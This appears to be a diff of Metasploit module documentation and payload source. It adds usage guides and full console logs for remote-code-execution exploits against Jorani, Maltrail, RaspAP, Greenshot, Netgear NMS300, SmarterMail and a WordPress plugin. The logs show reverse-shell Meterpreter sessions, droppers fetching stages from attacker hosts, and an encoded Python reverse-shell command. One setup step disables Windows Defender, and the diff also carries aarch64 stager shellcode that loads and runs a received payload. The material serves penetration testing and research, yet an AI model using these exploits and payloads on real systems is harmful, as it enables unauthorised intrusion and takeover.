+[+] Deleted nypafHKuf.php
+[*] Meterpreter session 6 opened (192.168.201.10:4444 -> 192.168.201.10:38108) at 2023-06-28 15:36:11 +0000
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.201.10
+OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
+Architecture : aarch64
+BuildTuple   : aarch64-linux-musl
+Meterpreter  : aarch64/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter >
+```
+### Windows Server 2019 Windows Command - cmd/windows/powershell/x64/meterpreter/reverse_tcp
+```
+msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
+[*] Executing Windows Command for cmd/windows/powershell/x64/meterpreter/reverse_tcp
+[*] Sending stage (200774 bytes) to 192.168.201.55
+[+] Deleted HAJSKquhaDT.php
+[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.55:50464) at 2023-06-28 14:21:39 +0000
+
+meterpreter > sysinfo
+Computer        : WIN-BJDNH44EEDB
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+### Windows Server 2019 Windows Dropper - windows/x64/meterpreter/reverse_tcp
+```
+msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
+[*] Executing Windows Dropper for windows/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.10:1981/yRZ6hM
+[*] Client 192.168.201.55 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1) requested /yRZ6hM
+[*] Sending payload to 192.168.201.55 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1)
+[*] Sending stage (200774 bytes) to 192.168.201.55
+[+] Deleted hjAQqbEFAt.php
+[*] Meterpreter session 4 opened (192.168.201.10:4444 -> 192.168.201.55:50519) at 2023-06-28 14:26:02 +0000
+[*] Command Stager progress - 100.00% done (146/146 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer        : WIN-BJDNH44EEDB
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+## Limitations
+No limitations.
@@ -0,0 +1,102 @@
+## Vulnerable Application
+
+Jorani prior to 1.0.2 allows unauthenticated users to execute arbitrary code.
+
+This is due to a lack of sanitization on the language parameter, which can lead to the file inclusion of arbitrary ".php" files.
+
+Moreover, the log file for jorani ends with ".php" in Jorani < 1.0.2.
+
+Log poisoning is possible, an attacker can abuse this to store malicious data in the log file.
+
+Data like '<?php ...;?>' can been added to the log file, then if this file is included by php, it will be executed.
+
+Finally, the controller responsible for recovering a page doesn't properly redirect requests made by Ajax.
+
+So the scripts will not stop after the redirection because an exit statement is missing.
+
+Because of this, the attacker can make the script continue and reach the LFI vulnerability without being authenticated.
+
+So by chaining theses 3 vulnerabilities an unauthenticated user can execute arbitrary code on the application.
+
+This module has been tested successfully on Jorani 1.0.0, Ubuntu 20.04 (x86_64) with kernel version 5.15.0-75.
+
+### Installation Steps
+For a step by step installation tutorial on Ubuntu please refer to [How to install Jorani](https://jorani.org/how-to-install-jorani.html)
+
+## Verification Steps
+1. Start `msfconsole`
+2. `use exploit/multi/php/jorani_path_trav`
+3. set `RHOSTS` and `RPORT`
+4. Confirm the target is vulnerable: `check`. The result expected is `The target appears to be vulnerable.`
+5. Default payload for the exploit will be `php/meterpreter/reverse_tcp`
+6. set `LHOST`
+7. `exploit`
+8. Confirm you have now a cmd session as www-data
+
+## Options
+
+### TARGETURI (optional)
+The path to the jorani website. By default it is empty.
+
+## Scenarios
+
+```
+msf6 exploit(multi/php/jorani_path_trav) > options
+
+Module options (exploit/multi/php/jorani_path_trav):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.16.199.158   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  jorani           yes       The base path of Jorani
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Jorani < 1.0.2
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/php/jorani_path_trav) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking Jorani version
+[+] Jorani seems to be running on the target!
+[+] Found version: 1.0.0
+[+] The target appears to be vulnerable.
+[*] Trying to exploit LFI
+[*] Recovering CSRF token
+[+] CSRF found: be7e8205ad5f1fae2834478acdd0b546
+[*] Poisoning log with payload..
+[*] Sending 1st payload
+[*] Including poisoned log file log-2023-08-18.php.
+[+] Triggering payload
+[*] Sending stage (39927 bytes) to 172.16.199.158
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.158:39624) at 2023-08-18 15:01:55 -0400
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : ubuntu
+OS          : Linux ubuntu 5.15.0-79-generic #86~20.04.2-Ubuntu SMP Mon Jul 17 23:27:17 UTC 2023 x86_64
+Meterpreter : php/linux
+meterpreter > exit
+```
+
@@ -4,7 +4,7 @@

 This module exploits a stack-based buffer overflow in the Solaris PAM
 library's username parsing code, as used by the SunSSH daemon when the
-keyboard-interactive authentication method is specified.
+`keyboard-interactive` authentication method is specified.

 Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox,
 VMware Fusion, and VMware Player. Bare metal untested. Your addresses
@@ -0,0 +1,92 @@
+## Vulnerable Application
+
+Maltrail is a malicious traffic detection system, utilizing publicly
+available blacklists containing malicious and/or generally suspicious trails.
+The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.
+The `subprocess.check_output` function in `mailtrail/core/http.py` contains
+a command injection vulnerability in the `params.get("username")` parameter.
+An attacker can exploit this vulnerability by injecting arbitrary OS commands
+into the username parameter. The injected commands will be executed with the
+privileges of the running process. This vulnerability can be exploited remotely
+without authentication.
+
+This issue was discovered and reported by Chris Wild @briskets.
+Check [here](https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/) for the original report.
+
+## Testing
+For installing the vulnerable version follow the steps below,
+1. Follow the manual installation steps given [here](https://github.com/stamparm/maltrail/tree/0.53#quick-start)
+2. After cloning the git project, simply do `git checkout 0.53` and proceed with the rest of the steps.
+
+After these steps the Maltrail web interface will be exposed on the `http://<target>:8338/`.
+
+## Verification Steps
+
+1. msfconsole
+2. Do: `use exploit/unix/http/maltrail_rce`
+3. Do: `set RHOST [IP]`
+3. Do: `set LHOST [IP]`
+4. Do: `run`
+
+## Options
+
+## Scenarios
+
+```
+msf6 > use exploit/unix/http/maltrail_rce 
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(unix/http/maltrail_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(unix/http/maltrail_rce) > set lhost 172.17.0.1
+lhost => 172.17.0.1
+msf6 exploit(unix/http/maltrail_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version Detected: 0.52
+[*] Executing Unix Command...
+[*] Sending stage (24772 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:42250) at 2023-08-10 22:31:03 +0200
+
+meterpreter > sysinfo 
+Computer     : bab669395cfe
+OS           : Linux 6.4.7-hardened1-2-hardened #1 SMP PREEMPT_DYNAMIC Wed, 02 Aug 2023 11:05:52 +0000
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > getuid 
+Server username: root
+meterpreter > 
+```
+
+```
+msf6 > use exploit/unix/http/maltrail_rce 
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(unix/http/maltrail_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(unix/http/maltrail_rce) > set lhost 172.17.0.1
+lhost => 172.17.0.1
+msf6 exploit(unix/http/maltrail_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version Detected: 0.52
+[*] Executing Linux Dropper...
+[*] Using URL: http://172.17.0.1:8080/Y9BtoN1
+[*] Client 172.17.0.2 (Wget/1.21.2) requested /Y9BtoN1
+[*] Sending payload to 172.17.0.2 (Wget/1.21.2)
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.17.0.2:48664) at 2023-08-10 22:33:27 +0200
+[*] Command Stager progress - 100.00% done (110/110 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo 
+Computer     : 172.17.0.2
+OS           : Ubuntu 22.04 (Linux 6.4.7-hardened1-2-hardened)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid 
+Server username: root
+meterpreter > 
+
+```
@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+RaspAP is feature-rich wireless router software that just works
+on many popular Debian-based devices, including the Raspberry Pi.
+
+A Command injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
+unauthenticated attackers to execute arbitrary commands via the cfg_id
+parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
+
+This Metasploit exploit module targets a command injection vulnerability (CVE-2022-39986) in RaspAP's web-gui PHP project,
+The vulnerability affects versions of `RaspAP` between `2.8.0` and `2.8.7`. By exploiting this flaw, an attacker can execute
+arbitrary commands in the context of the user running RaspAP. This issue was discovered and reported by Ismael0x00.
+Check [here](https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2) for the original writeup.
+
+## Testing
+For installing the vulnerable version follow the steps below,
+1. Follow the manual installation steps given [here](https://docs.raspap.com/manual/)
+2. After setting up the service, navigate to the `/var/www/html` directory
+3. Do `git checkout 2.8.0` for switching to the vulnerable version
+
+**Note: Project can also be installed inside a ubuntu/debian docker containers**
+
+## Verification Steps
+
+1. msfconsole
+2. Do: `use exploit/unix/http/raspap_rce`
+3. Do: `set RHOST [IP]`
+4. Do: `set RPORT [PORT]`
+5. Do: `check`
+
+## Options
+
+## Scenarios
+
+### Debian 12, Unix Command Target
+```
+msf6 > use exploit/unix/http/raspap_rce 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(unix/http/raspap_rce) > set rhosts 172.16.199.130
+rhosts => 172.16.199.130
+msf6 exploit(unix/http/raspap_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(unix/http/raspap_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Executing Unix Command with echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNo9UE1LxDAQPTe/IrckGMNmqZVdrCDiQUQEd28i0iajhqZpSLJaFf+7DVmcwwxv5s2bDzP6KSQcJzVA4t/W9LzvIjQ1jykcVOLJjIBep4BnbBwOnXsDKldsi6oUvhZfxbY0ixLomh/x7uH67mW3f7y5umeZJ9TkHKhEKZHnayEbITcbIQmvF2OZ0gfoBlTBrMCnrJ2Hi2gBPD1jyLZlJ3FwvlMDJZe3hEcRQH3QReBp9Yx0e8SWoc93YwFbcFSzC7vI6ZP/6mlJMwQzKJrPFhrUNPoAMdLyAdE3dU5qyEz+QyLZxl+G/gDVz18D\'\)\[0\]\)\)\) | exec $(which python || which python3 || which python2) -
+[*] Sending stage (24772 bytes) to 172.16.199.130
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.130:48494) at 2023-08-14 20:38:21 -0400
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : debian
+OS           : Linux 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-2 (2023-07-27)
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > 
+```
+
+### Debian 11, Linux Dropper Target
+```
+msf6 > use exploit/unix/http/raspap_rce 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(unix/http/raspap_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(unix/http/raspap_rce) > set lhost 172.17.0.1
+lhost => 172.17.0.1
+msf6 exploit(unix/http/raspap_rce) > set target 1
+target => 1
+msf6 exploit(unix/http/raspap_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Executing Linux Dropper
+[*] Using URL: http://172.17.0.1:8080/cH0NvADRgGYZoL
+[*] Client 172.17.0.2 (Wget/1.21) requested /cH0NvADRgGYZoL
+[*] Sending payload to 172.17.0.2 (Wget/1.21)
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:48940) at 2023-08-10 00:37:27 +0200
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Server stopped.
+
+meterpreter > getuid 
+Server username: www-data
+meterpreter > sysinfo 
+Computer     : 172.17.0.2
+OS           : Debian 11.6 (Linux 6.4.7-hardened1-2-hardened)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,100 @@
+## Description
+
+There exists a .NET deserialization vulnerability in Greenshot version 1.3.274
+and below.  The deserialization allows the execution of commands when a user opens
+a Greenshot file.  The commands execute under the same permissions as the Greenshot
+service.  Typically this is as the logged in user.
+
+## Vulnerable Application
+
+[Greenshot v1.3.274](https://github.com/greenshot/greenshot/releases/download/v1.3.274/Greenshot-INSTALLER-1.3.274-UNSTABLE.exe) and earlier
+
+## Verification Steps
+
+1. `./msfconsole`
+2. `set payload cmd/windows/http/x64/meterpreter/reverse_tcp`
+3. `set FETCH_SRVHOST <callback ip>`
+4. `set FETCH_WRITABLE_DIR %TEMP%`
+4. `set LHOST <callback ip>`
+5. `set DisablePayloadhandler false`
+6. `set wfsdelay 600`
+7. `run`
+9. Copy pdf over to target, ensuring that the `.greenshot` extension is preserved and open it.
+
+Note: The target machine running Foxit Reader will need network access to the system hosting the exe.
+
+## Scenarios
+
+### Greenshot v1.3.274 running on Windows 10 Pro x64 2004
+
+```
+msf6 > use exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set FETCH_SRVHOST 10.5.135.201
+FETCH_SRVHOST => 10.5.135.201
+msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set LHOST 10.5.135.201
+LHOST => 10.5.135.201
+msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set FETCH_WRITABLE_DIR %TEMP%
+FETCH_WRITABLE_DIR => %TEMP%
+msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set DisablePayloadHandler false
+DisablePayloadHandler => false
+msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set wfsdelay 600
+wfsdelay => 600
+msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > show options
+
+Module options (exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   FILENAME                   no        The file name.
+   PNG_FILE                   no        PNG file to use
+
+
+Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      tsuAqVhW         no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST       10.5.135.201     yes       Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > run
+
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[+] QsMBQrLmW.greenshot stored at /home/tmoose/.msf4/local/QsMBQrLmW.greenshot
+[*] Sending stage (200774 bytes) to 10.5.132.130
+[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.130:50221) at 2023-08-03 18:27:21 -0500
+
+meterpreter > sysinfo
+Computer        : DESKTOP-KAI0M8D
+OS              : Windows 10 (10.0 Build 19041).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-KAI0M8D\msfuser
+meterpreter > 
+
+```
@@ -0,0 +1,52 @@
+## Vulnerable Application
+
+Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
+The application has multiple vulnerabilities that can allow an unauthenticated remote
+attacker to execute code as SYSTEM user. Vulnerabilities include authentication bypass,
+SQL injection, arbitrary file upload, and privilege escalation across various versions.
+This module is able to spawn a meterpreter session by chaining together two specific
+vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.
+This module has been tested with versions `1.5.0.2`, `1.4.0.17`, `1.7.0.12`, and `1.7.0.1`.
+
+Note: Module should also work against version `1.1.0.13` but it wasn't tested.
+
+## Testing
+For installing the vulnerable version follow the steps below,
+1. Download the [installer](https://www.netgear.com/support/product/nms300#download) for versions below **v1.7.0.22**.
+2. Follow installation steps.
+
+After these steps the ProSAFE NMS web panel will be exposed on the `http://localhost:8080/` address.
+
+## Verification Steps
+
+1. msfconsole
+2. Do: `use exploit/windows/http/netgear_nms_rce`
+3. Do: `set RHOST [IP]`
+4. Do: `set RPORT [PORT]`
+5. Do: `exploit`
+
+## Options
+
+## Scenarios
+
+```
+msf6 > use exploit/windows/http/netgear_nms_rce
+[*] Using configured payload windows/meterpreter/reverse_tcp
+msf6 exploit(windows/http/netgear_nms_rce) > set rhosts 192.168.56.104
+rhosts => 192.168.56.104
+msf6 exploit(windows/http/netgear_nms_rce) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(windows/http/netgear_nms_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] 192.168.56.104:8080 - Uploading payload...
+[+] 192.168.56.104:8080 - Payload uploaded successfully
+[*] 192.168.56.104:8080 - Executing payload...
+[*] Sending stage (175686 bytes) to 192.168.56.104
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.104:50133) at 2023-08-02 22:40:21 +0200
+
+meterpreter > getuid 
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+
+```
@@ -7,25 +7,45 @@ The vulnerability affects:

 ### Description

-This module exploits a vulnerability in the SmarterTools SmarterMail software for version numbers <= 16.x or for build numbers < 6985. The vulnerable versions and builds expose three .NET remoting endpoints on port 17001, namely `/Servers`, `/Mail` and `/Spool`. For example, a typical installation of SmarterMail Build 6970 will have the `/Servers` endpoint exposed to the public at `tcp://0.0.0.0:17001/Servers`, where serialized .NET commands can be sent through a TCP socket connection.
+This module exploits a vulnerability in the SmarterTools SmarterMail software for
+version numbers <= 16.x or for build numbers < 6985. The vulnerable versions and builds
+expose three .NET remoting endpoints on port 17001, namely `/Servers`, `/Mail` and `/Spool`.
+For example, a typical installation of SmarterMail Build 6970 will have the `/Servers` endpoint
+exposed to the public at `tcp://0.0.0.0:17001/Servers`, where serialized .NET commands can be sent
+through a TCP socket connection.

-The three endpoints perform deserialization of untrusted data (CVE-2019-7214), allowing an attacker to send arbitrary commands to be deserialized and executed. This module exploits this vulnerability to perform .NET deserialization attacks, allowing remote code execution for any unauthenticated user under the context of the SYSTEM account. Successful exploitation results in full administrative control of the target server under the `NT AUTHORITY\SYSTEM` account.
+The three endpoints perform deserialization of untrusted data (CVE-2019-7214), allowing an attacker
+to send arbitrary commands to be deserialized and executed. This module exploits this vulnerability
+to perform .NET deserialization attacks, allowing remote code execution for any unauthenticated user
+under the context of the SYSTEM account. Successful exploitation results in full administrative
+control of the target server under the `NT AUTHORITY\SYSTEM` account.

-This vulnerability was patched in Build 6985, where the 17001 port is no longer publicly accessible, although it can be accessible locally at `127.0.0.1:17001`. Hence, this would still allow for a privilege escalation vector if the server is compromised as a low-privileged user.
+This vulnerability was patched in Build 6985, where the 17001 port is no longer publicly accessible,
+although it can be accessible locally at `127.0.0.1:17001`. Hence, this would still allow for a
+privilege escalation vector if the server is compromised as a low-privileged user.

 ### Setup

-This module was tested on SmarterMail Build 6919, 6970 (with positive results), Build 6985 (with negative results), and on Version 16.3.6989 (with positive results).
+This module was tested on SmarterMail Build 6919, 6970 (with positive results),
+Build 6985 (with negative results), and on Version 16.3.6989 (with positive results).

-Legacy builds and versions of SmarterMail can be obtained by signing up to the SmarterTools website to create a user account, and then navigating to the [Legacy Builds](https://www.smartertools.com/account#/downloads) page, where `EXE` and `MSI` files can be downloaded.
+Legacy builds and versions of SmarterMail can be obtained by signing up to the
+SmarterTools website to create a user account, and then navigating to the
+[Legacy Builds](https://www.smartertools.com/account#/downloads) page, where `EXE`
+and `MSI` files can be downloaded.

 ## Verification Steps

 1. Sign up to the [SmarterTools website](https://www.smartertools.com/). Log in with your created account.
-2. Download `EXE` legacy versions and builds from a dropdown menu at [Legacy Builds](https://www.smartertools.com/account#/downloads), specifically SmarterMail 16.x, Build 6970 and Build 6985.
-3. Install the executable file (e.g. `SmarterMail_6970.exe`) and follow the instructions provided. If reinstalling a different version/build, simply choose `Use an existing site` when prompted in `Site Configuration Type`, and select `SmarterMail` in the next option.
-4. Verify that the login page can be accessed at `http://localhost:9998/interface/root#/login`. Set Admin username and password to be `admin:admin` (or anything arbitrary) if prompted.
-5. Disable realtime protection on an Administrative PowerShell session with `Set-MpPreference -DisableRealtimeMonitoring $true`.
+2. Download `EXE` legacy versions and builds from a dropdown menu at [Legacy Builds](https://www.smartertools.com/account#/downloads),
+specifically SmarterMail 16.x, Build 6970 and Build 6985.
+3. Install the executable file (e.g. `SmarterMail_6970.exe`) and follow the instructions provided.
+If reinstalling a different version/build, simply choose `Use an existing site` when prompted
+in `Site Configuration Type`, and select `SmarterMail` in the next option.
+4. Verify that the login page can be accessed at `http://localhost:9998/interface/root#/login`.
+Set Admin username and password to be `admin:admin` (or anything arbitrary) if prompted.
+5. Disable realtime protection on an Administrative PowerShell session with
+`Set-MpPreference -DisableRealtimeMonitoring $true`.
 6. Start `msfconsole` and follow along with default options.
 7. Do: `use exploit/windows/http/smartermail_rce`
 8. Do: `set RHOSTS [SMARTERMAIL_SERVER_IP]`
@@ -38,23 +58,30 @@ Legacy builds and versions of SmarterMail can be obtained by signing up to the S

    0. Target 0 (default) - Windows Command uses a default PowerShell payload to execute
    code and open a Meterpreter session. However, any desired payload can be chosen. Choose with `set TARGET 0`.
-    1. Target 1 - x86/x64 Windows CmdStager uses a CmdStager with default `vbs` stager flavor to execute code and open a Meterpreter session. Choose with `set TARGET 1`.
+    1. Target 1 - x86/x64 Windows CmdStager uses a CmdStager with default `vbs` stager flavor to execute code
+    and open a Meterpreter session. Choose with `set TARGET 1`.

 ### ENDPOINT (Required)

-Choose one of three exposed .NET remoting endpoints, either `Servers`, `Spool` or `Mail`. The default is `Servers`, but any one of the three will do.
+Choose one of three exposed .NET remoting endpoints, either `Servers`, `Spool` or `Mail`.
+The default is `Servers`, but any one of the three will do.

 ### RPORT (Required)

-This is the port for the SmarterMail HTTP server, which is default on port 9998. Although this port is not required for exploitation, it is required for checking the vulnerability and version/build number of the SmarterMail software.
+This is the port for the SmarterMail HTTP server, which is default on port 9998.
+Although this port is not required for exploitation, it is required for checking the
+vulnerability and version/build number of the SmarterMail software.

 ### TARGETURI (Required)

-This is the base path of the SmarterMail HTTP server. The vulnerability check follows the redirect from base path `/` to the login page at `/interface/root#/login`, but this option is provided in case the login page is located at a different URI.
+This is the base path of the SmarterMail HTTP server. The vulnerability check follows the
+redirect from base path `/` to the login page at `/interface/root#/login`, but this option
+is provided in case the login page is located at a different URI.

 ### TCP_PORT (Required)

-This is the TCP port where the .NET remoting endpoints are located, and is required for sending serialized data and Meterpreter payloads. The default port is 17001.
+This is the TCP port where the .NET remoting endpoints are located, and is required for
+sending serialized data and Meterpreter payloads. The default port is 17001.

 ## Scenarios

@@ -314,4 +341,4 @@ type proof.txt
 84b4****************************

 C:\Users\Administrator\Desktop>
-```
+```
@@ -0,0 +1,111 @@
+// Compile: clang stage_mettle.s
+// Shellcode: objdump -d a.out | cut -d ' ' -f 2-5 | cut -d ' ' -f 2- | ruby tools/payloads/format_aarch64.rb
+.equ SYS_RECVFROM, 0x200001d
+.equ SYS_MPROTECT, 0x200004a
+.equ SYS_MMAP, 0x20000c5
+.equ SYS_EXIT, 0x2000001
+
+.global _main
+_main:
+    /* mmap(addr=0, length=stager_size, prot=0x2 (PROT_WRITE), flags=0x1002 (MAP_PRIVATE | MAP_ANON), fd=0, offset=0) */
+    mov    x0, xzr
+    adr    x1, stager_size
+    ldr    x1, [x1]
+    mov    x2, #2
+    mov    x3, #0x1002
+    mov    x4, xzr
+    mov    x5, xzr
+    ldr    x16, =SYS_MMAP
+    svc    0
+
+    /* sockfd is in x13 */
+    mov x10, x0
+
+    /* recvfrom(sockfd='x13', address='x10', length=stager_size, flags=0x40 (MSG_WAITALL), from=0, fromlenaddr=0) */
+    mov x0, x13
+    mov x1, x10
+    adr x2, stager_size
+    ldr x2, [x2]
+    mov x3, #0x40
+    mov x4, xzr
+    mov x5, xzr
+    ldr x16, =SYS_RECVFROM
+    svc 0
+
+    /* mprotect(addr='x10',  length=stager_size, prot=0x5 (PROT_READ | PROT_EXEC)) */
+    mov x0, x10
+    adr x1, stager_size
+    ldr x1, [x1]
+    mov x2, #5
+    ldr x16, =SYS_MPROTECT
+    svc 0
+
+    /* mmap(addr=0, length=payload_size, prot=3 (PROT_READ | PROT_WRITE), flags=0x1002 (MAP_PRIVATE | MAP_ANON), fd=0, offset=0) */
+    mov x0, xzr
+    adr x1, payload_size
+    ldr x1, [x1]
+    mov x2, #3
+    mov x3, #0x1002
+    mov x4, xzr
+    mov x5, xzr
+    ldr x16, =SYS_MMAP
+    svc 0
+
+    mov x11, x0
+
+    /* recvfrom(sockfd='x13', address='x11', length=payload_size, flags=0x40 (MSG_WAITALL), from=0, fromlenaddr=0) */
+    mov x0, x13
+    mov x1, x11
+    adr x2, payload_size
+    ldr x2, [x2]
+    mov x3, #0x40
+    mov x4, xzr
+    mov x5, xzr
+    ldr x16, =SYS_RECVFROM
+    svc 0
+
+    /* add entry_offset */
+    adr x0, entry_offset
+    ldr x0, [x0]
+    add x0, x0, x10
+    adr x10, payload_size
+    ldr x10, [x10]
+    mov x12, x11
+    mov x15, x0
+
+    /* make stack space */
+    /* mmap(addr=0, length=0x40000, prot=3 (PROT_READ | PROT_WRITE), flags=0x1002 (MAP_PRIVATE | MAP_ANON), fd=0, offset=0) */
+    mov x0, xzr
+    mov x1, 0x40000
+    mov x2, 3
+    mov x3, 0x1002
+    mov x4, xzr
+    mov x5, xzr
+    ldr x16, =SYS_MMAP
+    svc 0
+    //mov x1, sp
+    //bic sp, x1, #15
+    //sub sp, sp, 0x1000
+    add x0, x0, 0x20000
+    mov sp, x0
+
+    mov x0, x13
+
+    /* jump to main_osx */
+    blr x15
+
+failed:
+    mov    x0, 0
+    ldr    x16, =SYS_EXIT
+    svc    0
+
+.balign 16
+stager_size:
+        .word 0x4242
+        .word 0x4343
+payload_size:
+        .word 0x4444
+        .word 0x4545
+entry_offset:
+        .word 0x4646
+        .word 0x4747
@@ -0,0 +1,120 @@
+// Compile: clang stager_sock_reverse.s
